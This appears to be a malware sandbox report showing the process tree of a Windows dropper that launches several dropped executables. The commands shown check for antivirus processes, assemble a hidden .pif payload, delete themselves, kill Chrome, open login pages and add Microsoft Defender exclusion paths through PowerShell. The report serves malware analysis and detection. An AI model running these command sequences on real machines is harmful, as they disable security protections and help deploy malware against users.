PID 1164 wrote to memory of 3924	1164	4363463463464363463463463.exe	hv.exe
PID 1164 wrote to memory of 3924	1164	4363463463464363463463463.exe	hv.exe
PID 1164 wrote to memory of 2112	1164	4363463463464363463463463.exe	RiseBuild.exe
PID 1164 wrote to memory of 2112	1164	4363463463464363463463463.exe	RiseBuild.exe
PID 1164 wrote to memory of 2112	1164	4363463463464363463463463.exe	RiseBuild.exe
PID 1164 wrote to memory of 1536	1164	4363463463464363463463463.exe	GorgeousMovement.exe
PID 1164 wrote to memory of 1536	1164	4363463463464363463463463.exe	GorgeousMovement.exe
PID 1164 wrote to memory of 1536	1164	4363463463464363463463463.exe	GorgeousMovement.exe
PID 1536 wrote to memory of 1608	1536	GorgeousMovement.exe	cmd.exe
PID 1536 wrote to memory of 1608	1536	GorgeousMovement.exe	cmd.exe
PID 1536 wrote to memory of 1608	1536	GorgeousMovement.exe	cmd.exe
PID 1608 wrote to memory of 3888	1608	cmd.exe	cmd.exe
PID 1608 wrote to memory of 3888	1608	cmd.exe	cmd.exe
PID 1608 wrote to memory of 3888	1608	cmd.exe	cmd.exe
PID 3888 wrote to memory of 1992	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 1992	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 1992	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 2748	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 2748	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 2748	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 4052	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 4052	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 4052	3888	cmd.exe	tasklist.exe
PID 3888 wrote to memory of 1136	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 1136	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 1136	3888	cmd.exe	findstr.exe
PID 3888 wrote to memory of 1416	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 1416	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 1416	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 5040	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 5040	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 5040	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 3492	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 3492	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 3492	3888	cmd.exe	cmd.exe
PID 3888 wrote to memory of 2680	3888	cmd.exe	Accommodations.pif
PID 3888 wrote to memory of 2680	3888	cmd.exe	Accommodations.pif
PID 3888 wrote to memory of 2680	3888	cmd.exe	Accommodations.pif
PID 3888 wrote to memory of 1404	3888	cmd.exe	PING.EXE
PID 3888 wrote to memory of 1404	3888	cmd.exe	PING.EXE
PID 3888 wrote to memory of 1404	3888	cmd.exe	PING.EXE
PID 1164 wrote to memory of 556	1164	4363463463464363463463463.exe	tuc2.exe
PID 1164 wrote to memory of 556	1164	4363463463464363463463463.exe	tuc2.exe
PID 1164 wrote to memory of 556	1164	4363463463464363463463463.exe	tuc2.exe
PID 556 wrote to memory of 648	556	tuc2.exe	tuc2.tmp
PID 556 wrote to memory of 648	556	tuc2.exe	tuc2.tmp
PID 556 wrote to memory of 648	556	tuc2.exe	tuc2.tmp
PID 1164 wrote to memory of 1484	1164	4363463463464363463463463.exe	kb%5Efr_ouverture.exe
PID 1164 wrote to memory of 1484	1164	4363463463464363463463463.exe	kb%5Efr_ouverture.exe
PID 1164 wrote to memory of 1484	1164	4363463463464363463463463.exe	kb%5Efr_ouverture.exe
PID 648 wrote to memory of 660	648	tuc2.tmp	schtasks.exe
PID 648 wrote to memory of 660	648	tuc2.tmp	schtasks.exe
PID 648 wrote to memory of 660	648	tuc2.tmp	schtasks.exe
PID 648 wrote to memory of 416	648	tuc2.tmp	qtsplitcontrolref.exe
PID 648 wrote to memory of 416	648	tuc2.tmp	qtsplitcontrolref.exe
PID 648 wrote to memory of 416	648	tuc2.tmp	qtsplitcontrolref.exe
PID 648 wrote to memory of 4636	648	tuc2.tmp	qtsplitcontrolref.exe
PID 648 wrote to memory of 4636	648	tuc2.tmp	qtsplitcontrolref.exe
PID 648 wrote to memory of 4636	648	tuc2.tmp	qtsplitcontrolref.exe
PID 1164 wrote to memory of 1708	1164	4363463463464363463463463.exe	hack1226.exe
PID 1164 wrote to memory of 1708	1164	4363463463464363463463463.exe	hack1226.exe
PID 1164 wrote to memory of 1708	1164	4363463463464363463463463.exe	hack1226.exe
PID 1164 wrote to memory of 1828	1164	4363463463464363463463463.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164

C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
2⤵
- Executes dropped EXE
PID:3924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:7472

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /im chrome.exe /f
4⤵
- Kills process with taskkill
PID:9016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1004
3⤵
- Program crash
PID:8156

C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe"
2⤵
- Executes dropped EXE
PID:2112

C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k cmd < Suddenly & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
5⤵
PID:2748

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe"
5⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir 6483
5⤵
PID:1416

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Antique + Assurance + Volkswagen + Succeed + Equations 6483\Accommodations.pif
5⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Matches + Neck 6483\c
5⤵
PID:3492

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:1404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\6483\Accommodations.pif
6483\Accommodations.pif 6483\c
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping google.com && erase C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\6483\Accommodations.pif
6⤵
PID:7828

C:\Windows\SysWOW64\PING.EXE
ping google.com
7⤵
- Runs ping.exe
PID:7356

C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:556

C:\Users\Admin\AppData\Local\Temp\is-FCRHS.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FCRHS.tmp\tuc2.tmp" /SL5="$B0022,4518052,566784,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:648

C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe
"C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe" -i
4⤵
- Executes dropped EXE
PID:416

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "QTSCR1213"
4⤵
PID:660

C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe
"C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe" -s
4⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"
2⤵
- Executes dropped EXE
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 724
3⤵
- Program crash
PID:1816

C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"
2⤵
- Executes dropped EXE
PID:1708

C:\Users\Admin\AppData\Local\Temp\Files\go.exe
"C:\Users\Admin\AppData\Local\Temp\Files\go.exe"
2⤵
PID:1828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
3⤵
PID:1356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
4⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
4⤵
PID:1148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
4⤵
PID:4336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
4⤵
PID:5060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2
4⤵
PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
4⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
4⤵
PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
4⤵
PID:2428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5444 /prefetch:8
4⤵
PID:5644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 /prefetch:8
4⤵
PID:6468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
4⤵
PID:7180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
4⤵
PID:7172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
4⤵
PID:8212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:1
4⤵
PID:8200

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,1281737871548915484,6542985959783456601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6212 /prefetch:8
4⤵
PID:6480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
4⤵
PID:2880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
3⤵
PID:724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,11034330155269956907,15992739378761193416,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
4⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,11034330155269956907,15992739378761193416,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2036 /prefetch:2
4⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
4⤵
PID:3568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,9899604551069110004,12052961699108408734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 /prefetch:3
4⤵
PID:2240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
4⤵
PID:896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
3⤵
PID:2820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
4⤵
PID:3460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3008 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:8
4⤵
PID:6684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1872 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:8
4⤵
PID:6676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:2
4⤵
PID:6668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4116 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:7248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3848 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:6192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4732 --field-trial-handle=2348,i,15715904514860234313,12809174138966520993,131072 /prefetch:1
4⤵
PID:7552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
3⤵
PID:248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
4⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 --field-trial-handle=1944,i,5142353254251916147,6093205445681297400,131072 /prefetch:8
4⤵
PID:6376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1944,i,5142353254251916147,6093205445681297400,131072 /prefetch:2
4⤵
PID:6368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
3⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1956,i,3428422894561390492,14100910390073308665,131072 /prefetch:8
4⤵
PID:7332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1956,i,3428422894561390492,14100910390073308665,131072 /prefetch:2
4⤵
PID:7324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
4⤵
PID:3520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
3⤵
PID:6940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
3⤵
PID:6924

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
4⤵
PID:7024

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
3⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
2⤵
PID:5444

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
3⤵
PID:1924

